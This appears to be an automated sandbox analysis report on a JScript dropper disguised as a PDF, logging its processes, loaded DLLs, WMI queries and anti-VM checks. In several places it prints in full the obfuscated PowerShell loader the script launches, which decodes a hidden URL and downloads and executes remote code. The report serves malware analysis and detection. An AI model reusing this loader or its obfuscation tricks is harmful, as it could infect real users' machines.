    Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: _DRP12938938231_PDF.js ReversingLabs: Detection: 15%
    Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\_DRP12938938231_PDF.js"
    Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\conhost.exe conhost --headless powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)
    Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)
    Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
    Source: C:\Windows\System32\wscript.exe Section loaded: edgegdi.dll
    Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
    Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
    Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
    Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
    Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
    Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
    Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
    Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
    Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
    Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
    Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
    Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
    Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
    Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
    Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
    Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
    Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
    Source: Binary string: m.Core.pdb source: powershell.exe, 00000003.00000002.79918722425.0000016D428AE000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000003.00000002.79920045431.0000016D42C41000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdbCLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000003.00000002.79920045431.0000016D42BCD000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: .Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000003.00000002.79922477696.0000016D42F16000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000003.00000002.79920045431.0000016D42C41000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000003.00000002.79921044319.0000016D42C8E000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000003.00000002.79921813941.0000016D42CFE000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb` source: powershell.exe, 00000003.00000002.79920045431.0000016D42C41000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb34e089 source: powershell.exe, 00000003.00000002.79921813941.0000016D42CFE000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000003.00000002.79922477696.0000016D42EE0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000003.00000002.79920045431.0000016D42BCD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79921044319.0000016D42C87000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: *n.pdb source: powershell.exe, 00000003.00000002.79918722425.0000016D428AE000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbm source: powershell.exe, 00000003.00000002.79923029249.0000016D42F2C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: ows\System.Core.pdb`8 source: powershell.exe, 00000003.00000002.79918722425.0000016D428AE000.00000004.00000020.00020000.00000000.sdmp

    Data Obfuscation

    Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\conhost.exe conhost --headless powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)
    Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFCF401D2A5 pushad ; iretd 3_2_00007FFCF401D2A6
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFCF41380B8 push ebx; ret 3_2_00007FFCF413814A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFCF4410A89 push esi; retf 3_2_00007FFCF4410AAA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFCF4410379 push edx; retf 3_2_00007FFCF441037A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFCF4413714 pushfd ; retf 3_2_00007FFCF441372A
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFCF441A5DB push eax; retf 3_2_00007FFCF441A6FA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFCF4417212 push es; retf 3_2_00007FFCF4417217

    Persistence and Installation Behavior

    Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

    Hooking and other Techniques for Hiding and Protection

    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
    Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
    Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9917
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5328 | Thread sleep count: 9917 > 30
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2C2D9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: IsVirtualMachineh
    Source: powershell.exe, 00000003.00000002.79910993215.0000016D3A7BB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2C2D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79881311037.0000016D2A908000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.79920045431.0000016D42BFA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: IsVirtualMachine
    Source: powershell.exe, 00000003.00000002.79920045431.0000016D42BFA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: booleanIsVirtualMachine
    Source: powershell.exe, 00000003.00000002.79881311037.0000016D2C2D9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: "IsVirtualMachine"
    Source: powershell.exe, 00000003.00000002.79920045431.0000016D42BCD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
    Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)
    Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\conhost.exe conhost --headless powershell $xyhqerilkpf='ur' ;new-alias printout c$($xyhqerilkpf)l;$rlgibutmdjea=(8606,8593,8596,8589,8595,8613,8608,8542,8608,8589,8595,8613,8588,8537,8607,8602,8603,8538,8540,8537,8603,8595,8603,8554,8606,8552,8600,8596,8601,8607,8606,8541,8540);$pwzlqamobsvir=('bronx','get-cmdlet');$fgncdqhom=$rlgibutmdjea;foreach($zawohn in $fgncdqhom){$iegjlbcr=$zawohn;$robvxc=$robvxc+[char]($iegjlbcr-8491);$tozjeb=$robvxc; $jvdhbt=$tozjeb};$vdtwhnebils[2]=$jvdhbt;$nmbtsery='rl';$qcmshfkotzdnwr=1;.$([char](9992-9887)+'e'+'x')(printout -useb $jvdhbt)
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
